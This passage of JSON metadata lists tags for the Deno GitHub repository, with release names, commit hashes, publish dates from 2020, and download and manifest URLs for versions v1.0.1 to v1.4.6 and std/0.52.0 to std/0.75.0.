_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_u